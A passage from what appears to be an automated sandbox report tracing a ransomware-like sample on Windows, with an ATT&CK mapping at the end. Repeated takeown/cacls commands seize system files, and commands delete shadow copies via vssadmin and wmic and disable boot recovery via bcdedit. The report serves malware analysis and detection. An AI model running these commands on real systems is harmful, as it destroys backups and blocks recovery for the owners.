C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "superbar.png" -nobanner3⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "superbar.png" -nobanner4⤵PID:5668
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:5716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:5652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "background.png" -nobanner3⤵PID:5836
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "background.png" -nobanner4⤵PID:5876
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""2⤵PID:5808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C3⤵PID:5968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner3⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner4⤵PID:6008
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:5940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:5132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵PID:4100
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:5176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:5192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "background.png" -nobanner3⤵PID:5232
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "background.png" -nobanner4⤵PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""2⤵PID:5336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C3⤵PID:5548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "utc.cert.json" -nobanner3⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "utc.cert.json" -nobanner4⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5824
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:5844
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""2⤵PID:5900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C3⤵PID:5792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "edbres00002.jrs" -nobanner3⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "edbres00002.jrs" -nobanner4⤵PID:6060
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:5932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:5152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:4420
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:5280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:5216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:5260
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:5540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:5332
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:5604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "watermark.png" -nobanner3⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "watermark.png" -nobanner4⤵PID:6032
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""2⤵PID:6056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C3⤵PID:5648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "utc.tracing.json" -nobanner3⤵PID:4652
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "utc.tracing.json" -nobanner4⤵PID:6092
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""2⤵PID:4888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C3⤵PID:5212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "SmsInterceptStore.jfm" -nobanner3⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "SmsInterceptStore.jfm" -nobanner4⤵PID:5420
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:5404
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "device.png" -nobanner3⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "device.png" -nobanner4⤵PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""2⤵PID:5896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:6052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "osver.txt" -nobanner3⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "osver.txt" -nobanner4⤵PID:5640
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""2⤵PID:4508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C3⤵PID:5944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"3⤵
- Modifies file permissions
PID:5784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "qmgr.jfm" -nobanner3⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "qmgr.jfm" -nobanner4⤵PID:5352
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:5728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:5880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "overlay.png" -nobanner3⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "overlay.png" -nobanner4⤵PID:6104
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""2⤵PID:5552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C3⤵PID:5476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "utc.app.json" -nobanner3⤵PID:5620
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "utc.app.json" -nobanner4⤵PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""2⤵PID:5772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C3⤵PID:5672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "parse.dat" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "parse.dat" -nobanner4⤵PID:5768
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""2⤵PID:6028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C3⤵PID:6000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "edb.chk" -nobanner3⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "edb.chk" -nobanner4⤵PID:5904
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e2jzoROa.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:1764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c L5BjIoLQ.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\L5BjIoLQ.exeL5BjIoLQ.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:356
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\AXFIGuvD.bat"1⤵PID:3800
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4344
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5440
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:1728
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:5972
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:5760
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:5236
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3